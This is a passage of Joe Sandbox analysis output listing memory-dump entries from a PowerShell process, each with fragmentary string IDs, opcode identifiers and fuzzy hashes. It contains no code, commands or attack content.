                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$84tl$XRdq$XRdq$XRdq$tP_q$tP_q$$_q
                                                                  • API String ID: 0-1678073206
                                                                  • Opcode ID: 318699de404db399e8d0ecd1daefd84a04354b54b29e2dded9add0572cb707c0
                                                                  • Instruction ID: c418e55b1b05ad9fe64c845d6a217cc7c5b2262f33126e30aee0d2e211dad546
                                                                  • Opcode Fuzzy Hash: 318699de404db399e8d0ecd1daefd84a04354b54b29e2dded9add0572cb707c0
                                                                  • Instruction Fuzzy Hash: 256137327002059FCB299F6AC506A7BBBB2EF84310F14C469E9159F6A9CB31DD44CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$84tl$d%eq$d%eq$d%eq$tP_q$$_q
                                                                  • API String ID: 0-2662873321
                                                                  • Opcode ID: 81c016a080962c91cb389fafd78870f3c3463845f1ff3f6d416bc3e631994681
                                                                  • Instruction ID: 3828a0b6727eb5cc334bdd72978e918dac8aa073f534073e5364de1417df4d61
                                                                  • Opcode Fuzzy Hash: 81c016a080962c91cb389fafd78870f3c3463845f1ff3f6d416bc3e631994681
                                                                  • Instruction Fuzzy Hash: C65114F6704207DFDF24CF24C940BAABBB7AF85718F188495EA119B291D731D980CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (M($(M($4'_q$4'_q$$_q$$_q$$_q
                                                                  • API String ID: 0-4210806055
                                                                  • Opcode ID: 8bc8120feb3a42fa42b1502443ba9953a37064b9a65f6e74bfb222b8a063b8b6
                                                                  • Instruction ID: cb7b259bbe832079fd415bc231602fe42076741f97a9a34ca88fdf4be61feab1
                                                                  • Opcode Fuzzy Hash: 8bc8120feb3a42fa42b1502443ba9953a37064b9a65f6e74bfb222b8a063b8b6
                                                                  • Instruction Fuzzy Hash: EA3177B2704317CBCF295A368810676B7ABAFC1358B24847ADA15C6248DAB1C405C752
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (o_q$(o_q$(o_q$(o_q$P ($P (
                                                                  • API String ID: 0-328041171
                                                                  • Opcode ID: 8623e241b1b9e5a37c1528f34545570ab1d97d3f8b24e84f5259bab5fedc741c
                                                                  • Instruction ID: f427e94f83866282ad20dc3e878268979e5c70b920a7b7c591a95b3fc8204826
                                                                  • Opcode Fuzzy Hash: 8623e241b1b9e5a37c1528f34545570ab1d97d3f8b24e84f5259bab5fedc741c
                                                                  • Instruction Fuzzy Hash: ACF159B170534ADFCB158F29C8447AABBA6EF81318F14847BE615CB2B1CB31C885C761
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                                  • API String ID: 0-155944776
                                                                  • Opcode ID: 16467da22b94234db7d55a38a33f8f7209e1bfb1577ca31a2fadb547ef36e538
                                                                  • Instruction ID: 58f4a09d715fbe9b0e3a7189aba011469a84e003b5dbc655f974d387a7925977
                                                                  • Opcode Fuzzy Hash: 16467da22b94234db7d55a38a33f8f7209e1bfb1577ca31a2fadb547ef36e538
                                                                  • Instruction Fuzzy Hash: 2E314BF67047878FCB294EB9DC501BAB7EAAFE2219B24887FC6458B246CE71C405C351
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$84tl$d%eq$d%eq$d%eq$tP_q
                                                                  • API String ID: 0-1245653128
                                                                  • Opcode ID: 9018a551b385447eb82d4dd923d784492c72b510bca031688c64014fe46919e9
                                                                  • Instruction ID: 23e018cffcc3006cf41aa8450626a017805b23d522be109229c1e541bd94468a
                                                                  • Opcode Fuzzy Hash: 9018a551b385447eb82d4dd923d784492c72b510bca031688c64014fe46919e9
                                                                  • Instruction Fuzzy Hash: BB318FB5B00215DFCB24DF58C944AA9B7F7AB89B18F248559EA05AB354C731EC41CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$_$tP_q$tP_q
                                                                  • API String ID: 0-3488696322
                                                                  • Opcode ID: 2dd3015a3a86c15e4a0364ed116d96d7061bd2f40eef538336c0db8b2dd85397
                                                                  • Instruction ID: 3412b1bb2dbffd6340f9d8c0f10a4283aab195ca7045028e7313d6c2c1f97ce0
                                                                  • Opcode Fuzzy Hash: 2dd3015a3a86c15e4a0364ed116d96d7061bd2f40eef538336c0db8b2dd85397
                                                                  • Instruction Fuzzy Hash: A7917EB1B043569FCB159F3588107ABBBE6AFC2318F14C4AAD601CF296DB75D844C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$84tl$tP_q$tP_q$$_q
                                                                  • API String ID: 0-2643698805
                                                                  • Opcode ID: f12f48236e8721f950bd7ede27c7e323347395ae326b3c19bff64ae5361f2b85
                                                                  • Instruction ID: 654e4b270306da0942fe79810853580a6cb3ed9049d4e29f81b0602f48af9add
                                                                  • Opcode Fuzzy Hash: f12f48236e8721f950bd7ede27c7e323347395ae326b3c19bff64ae5361f2b85
                                                                  • Instruction Fuzzy Hash: 37614A71700216DFCB249F68C444A6ABBE7EF89718F24C86ADA159F355CB31DC41CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$h2ik$tLhk
                                                                  • API String ID: 0-1617002787
                                                                  • Opcode ID: ef72ad4322644cc157a4c52411d91881e332f8115e31ebe777a3485114c7bed1
                                                                  • Instruction ID: 964c1eea21e458e4d8a83314ed78beba4e7d63b4f1335009922c3c527896e8ea
                                                                  • Opcode Fuzzy Hash: ef72ad4322644cc157a4c52411d91881e332f8115e31ebe777a3485114c7bed1
                                                                  • Instruction Fuzzy Hash: 526106F0A10216DFDF34CF98C950BAAB7B6AF55308F5084AADB096B700D770AD84CB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$$_q$$_q$$_q
                                                                  • API String ID: 0-4191971291
                                                                  • Opcode ID: 87f2e2a4f1487a69a7db1659db563413261fa281dc3523523616d760c680106f
                                                                  • Instruction ID: 69d115a296521db1da45b20b6d09258af4b01a2a9f24bbabf2df160f4505bb9e
                                                                  • Opcode Fuzzy Hash: 87f2e2a4f1487a69a7db1659db563413261fa281dc3523523616d760c680106f
                                                                  • Instruction Fuzzy Hash: 5F416AF170430A9FCB254F2D88106BE7BAAAFC1314F14456AEA01CB293DB71C855C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$$_q$$_q$$_q
                                                                  • API String ID: 0-4191971291
                                                                  • Opcode ID: bba6bc8c86bc2f90aedb07084f4acd7e7109e3d079870183b29186bdcdee2abb
                                                                  • Instruction ID: 15e16665bbfb7e986c062fdc8a9a5376af21a297b1a99b9c8635322ba73f76a6
                                                                  • Opcode Fuzzy Hash: bba6bc8c86bc2f90aedb07084f4acd7e7109e3d079870183b29186bdcdee2abb
                                                                  • Instruction Fuzzy Hash: CA417CF5700607DFCB294E298400575B7EAAF82229F2B886AEA208B251DB35C861C711
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP_q$$_q$$_q$$_q$$_q
                                                                  • API String ID: 0-340533038
                                                                  • Opcode ID: fe5a0e352bad5b0b39822a28bbb94e92e2be19e945ad3ac19e06adf060b07983
                                                                  • Instruction ID: ab053215c97dfdf52f3520fbe87e677b57dc9635fb257c3854c900d61a55d933
                                                                  • Opcode Fuzzy Hash: fe5a0e352bad5b0b39822a28bbb94e92e2be19e945ad3ac19e06adf060b07983
                                                                  • Instruction Fuzzy Hash: DB212577608215CFCB258FD5C544A6BBBF8AF42B61B18806AF9049B239C731DD00CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP_q$$_q$$_q$$_q$$_q
                                                                  • API String ID: 0-340533038
                                                                  • Opcode ID: 5e32add420b6069ec300adb586f205e68879a30d2a5a2bd418d7be9ef2da1d17
                                                                  • Instruction ID: 86a13e339a28a390676fe460952aba236e9b6efceab133d2305806e4dec352bf
                                                                  • Opcode Fuzzy Hash: 5e32add420b6069ec300adb586f205e68879a30d2a5a2bd418d7be9ef2da1d17
                                                                  • Instruction Fuzzy Hash: 5D21F177608216CFDB258F95C544A6BBBF8AF42751B18806AF904AB239C731DD40CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$84tl$tP_q$tP_q
                                                                  • API String ID: 0-976498842
                                                                  • Opcode ID: b077ffa86fcc5a2e21eb8d344b15ce9c511a9d1184b5cf5337b01360eff3977f
                                                                  • Instruction ID: b81c6cd988c259bc6d838b45ec6b53842d39d8aff1485e5b4f1c7a759c558504
                                                                  • Opcode Fuzzy Hash: b077ffa86fcc5a2e21eb8d344b15ce9c511a9d1184b5cf5337b01360eff3977f
                                                                  • Instruction Fuzzy Hash: 9E9151B17003069FCB149F69C950B7ABBEAAF85718F29C8AAD605CB291DB31DC44C791
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$84tl$tP_q$tP_q
                                                                  • API String ID: 0-976498842
                                                                  • Opcode ID: 6e58d85957349dbc34633b800c50a7f42688277438a3d73a4f72fa01c1abd602
                                                                  • Instruction ID: 0d6678bb9e009d6793dc7241a2952a171e3f079bb33ec8ce0718d9b8a92216df
                                                                  • Opcode Fuzzy Hash: 6e58d85957349dbc34633b800c50a7f42688277438a3d73a4f72fa01c1abd602
                                                                  • Instruction Fuzzy Hash: E6914A35A002099FCB24CF58C545AA9BBF6FF85760F19C869F9059B2A8D771EC50CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl
                                                                  • API String ID: 0-993764349
                                                                  • Opcode ID: 1cc65d71880fce72979f8680bd399ab5c0f0c20e91ba04684155b2d483b53462
                                                                  • Instruction ID: 4a83ead8235639f3eb3e6b8661e37592c52c3a5537f5634a4d816c7e019b440d
                                                                  • Opcode Fuzzy Hash: 1cc65d71880fce72979f8680bd399ab5c0f0c20e91ba04684155b2d483b53462
                                                                  • Instruction Fuzzy Hash: 7B7190B4A00105EFCB54CF58C951EAEBBB6EF85318F24C069DA14AB754DB31EC81CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $_q$$_q$$_q$$_q
                                                                  • API String ID: 0-1171383116
                                                                  • Opcode ID: 7fa107c04e2734546ae37f058079020b0d23ea885951ace0c1c87764308d072a
                                                                  • Instruction ID: a095ee24156454c0cb551c79f6e762ae18ec5808c74beab1bc347e67f6977d3b
                                                                  • Opcode Fuzzy Hash: 7fa107c04e2734546ae37f058079020b0d23ea885951ace0c1c87764308d072a
                                                                  • Instruction Fuzzy Hash: 4A217DF23102076BDB38593A4C01B27B6DE5BC271DF24842AE605C7391DDBDC8458371
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (o_q$P ($P ($W
                                                                  • API String ID: 0-442717507
                                                                  • Opcode ID: c2bb51cfd76eb3a5205d28b620807ce7b771c18f8941854e81478e5f955cbb33
                                                                  • Instruction ID: 2a15d20f48f3530bf429ff8f8f122cbde0ea7fdec7a6dff91a79ce3e6b8bd392
                                                                  • Opcode Fuzzy Hash: c2bb51cfd76eb3a5205d28b620807ce7b771c18f8941854e81478e5f955cbb33
                                                                  • Instruction Fuzzy Hash: 893104B061124ADFDFA4DF18C944BAA7BB6BF41318F04C166E6158B1B0C3B0D9C0CB62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W$$_q$$_q$$_q
                                                                  • API String ID: 0-3039409474
                                                                  • Opcode ID: 3b8e270800ee2a01b33d6892ce8bed3ac0d8f1941f52def2a98ea8c75789d1e2
                                                                  • Instruction ID: 02c0cd0676b4da61a97448f6a2361eb2249c38c7416571a40a73afcd7d647f7d
                                                                  • Opcode Fuzzy Hash: 3b8e270800ee2a01b33d6892ce8bed3ac0d8f1941f52def2a98ea8c75789d1e2
                                                                  • Instruction Fuzzy Hash: 1B1159F23143077BEF3449268941B26A6DA5B8271DF248426AF04A73D1DABDC8848771
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$$_q$$_q
                                                                  • API String ID: 0-1173716036
                                                                  • Opcode ID: 7c008adc202f0aaa2896b9234c1b672dec97b2bd2146781df84c797657100f6f
                                                                  • Instruction ID: 52663d117be8122a6657e56034d213310efa760b0abacfdfbebb734debd35fda
                                                                  • Opcode Fuzzy Hash: 7c008adc202f0aaa2896b9234c1b672dec97b2bd2146781df84c797657100f6f
                                                                  • Instruction Fuzzy Hash: 9B01D4A170E3878FC32F062C4924626AFFA9F83A14B2945E7D580CF257CA948C0583A7